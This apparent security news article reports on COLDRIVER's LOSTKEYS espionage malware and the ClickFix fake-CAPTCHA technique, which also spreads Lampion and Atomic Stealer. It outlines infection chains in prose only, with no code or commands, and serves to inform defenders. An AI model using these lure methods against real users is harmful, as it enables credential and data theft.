LOSTKEYS Malware

The Russia-linked threat actor known as COLDRIVER has expanded its toolkit, moving beyond traditional credential phishing campaigns. Recently, the group was spotted deploying a new malware strain called LOSTKEYS in a targeted espionage campaign. This marks the second custom malware linked to COLDRIVER, following SPICA. Also tracked under aliases like Callisto, Star Blizzard, and UNC4057, COLDRIVER is infamous for credential theft, email exfiltration, and contact list harvesting. Now, its playbook includes selective malware deployment to access system files and data.

LOSTKEYS Unveiled: A Stealthy and Targeted Threat

LOSTKEYS is designed to stealthily exfiltrate sensitive information, including files from specific directories, running processes and system details. It has been deployed in operations during January, March and April 2025. Targets include current and former advisors to Western governments and militaries, journalists, think tanks, NGOs and individuals associated with Ukraine. Notably, the malware seems to be deployed selectively, emphasizing its use in highly targeted attacks.

Social Engineering 2.0: The ClickFix Connection

The infection chain begins with a fake CAPTCHA prompt hosted on a decoy website. Victims are tricked into opening the Windows Run dialog and pasting a PowerShell command copied to their clipboard—a method known as ClickFix. This command fetches a second-stage downloader from a remote server, which then delivers a third-stage PowerShell script. This script executes LOSTKEYS on the host while evading detection in virtual environments.

Repurposed Malware or Early Testing?

Security researchers discovered LOSTKEYS samples dating back to December 2023 that mimicked binaries from Maltego, an open-source investigation platform. It's still unclear whether these were early test versions or unrelated uses of the malware prior to its confirmed deployment in 2025.

ClickFix’s Broader Adoption and Hurtful Reach

The ClickFix technique is gaining popularity among various threat actors for malware distribution. Two notable examples include:

• Lampion Banking Trojan: Delivered via phishing emails with ZIP attachments. Inside, an HTML file redirects victims to a fake CAPTCHA page with ClickFix instructions, initiating a multi-stage infection targeting Portuguese-speaking sectors such as government, finance, and transportation.
• Atomic Stealer for macOS: Paired with a tactic called EtherHiding, where Binance Smart Chain (BSC) contracts hide payloads. Victims who click 'I'm not a robot' unknowingly trigger a Base64 command, which is then run in Terminal to download and execute a signed Mach-O binary confirmed as Atomic Stealer.

MacReaper: A Widespread Campaign with Legitimate Website Exploitation

Further investigation has linked the Atomic Stealer campaign to a large-scale watering hole attack dubbed MacReaper. Nearly 2,800 legitimate websites were compromised to display fake CAPTCHA prompts. These attacks used obfuscated JavaScript, full-screen iframes and blockchain-based infrastructure to evade detection and maximize infections.